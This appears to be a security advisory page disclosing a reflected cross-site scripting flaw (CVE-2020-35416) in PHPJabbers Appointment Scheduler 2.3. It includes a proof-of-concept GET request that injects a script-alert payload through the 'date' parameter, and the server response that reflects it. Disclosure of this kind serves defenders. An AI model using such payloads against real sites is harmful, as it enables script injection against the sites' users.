PHPJabbers Appointment Scheduler 2.3 Cross Site Scripting

2020.12.15
Credit: Andrea Intilangelo
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2020-35416
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting) # Date: 2020-12-14 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.phpjabbers.com # Software Link: https://www.phpjabbers.com/appointment-scheduler # Version: 2.3 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60) # CVE: CVE-2020-35416 Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML. Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others. PoC Request: GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1 Host: [removed] Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 X-Requested-With: XMLHttpRequest Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://[removed] Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422 PoC Response: HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Dec 2020 10:48:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Origin, X-Requested-With Content-Length: 13988 <div class="container-fluid"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12"> <div class="panel panel-default pjAsContainer pjAsAside"> <div class="panel-heading p ...[SNIP]... <div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div> ...[SNIP]... PoC Screenshots: https://imgrz.com/item/naqZ https://imgrz.com/item/ngZ1 or https://imagebin.ca/v/5kkKgOdFS9n5 https://imagebin.ca/v/5kkKlhi4amhj


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top